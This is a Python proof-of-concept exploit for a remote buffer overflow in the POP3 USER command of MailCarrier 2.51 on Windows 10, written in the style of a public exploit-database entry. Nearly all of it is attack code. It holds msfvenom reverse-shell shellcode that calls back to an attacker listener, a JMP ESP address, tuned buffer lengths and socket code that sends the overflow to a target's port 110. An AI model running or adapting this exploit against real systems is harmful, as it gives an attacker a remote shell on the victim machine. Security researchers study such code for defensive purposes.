  25. # Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow # Date: 2019-10-01 # Author: Lance Biggerstaff # Original Exploit Author: Dino Covotsos - Telspace Systems # Vendor Homepage: https://www.tabslab.com/ # Version: 2.51 # Tested on: Windows 10 # Note: Every version of Windows 10 has a different offset and sometimes you need to run the exploit twice before you can pop a shell ¯\_(ツ)_/¯ #!/usr/bin/python import sys import socket import time #msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python buf = "" buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81" buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c" buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce" buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a" buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6" buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8" buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75" buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0" buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc" buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8" buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba" buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06" buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94" buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c" buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe" buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c" buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d" buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11" buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12" buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e" buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d" buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7" buf += 
"\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27" buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c" buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0" buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb" buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7" buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3" buf += "\x32\xb4\xfe\x5c" jmpesp = '\x23\x49\xA1\x0F' # buffer length depends on length of source ip address, 5095 works for xxx.xxx.xx.x, you may need to tweak the length up or down #buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5094 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5096 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) #buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730) print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect=s.connect(("TARGET", 110)) print s.recv(1024) s.send('USER ' + buffer + '\r\n') print s.recv(1024) s.send('QUIT\r\n') s.close() time.sleep(1) print "[*] Done, but if you get here the exploit failed!"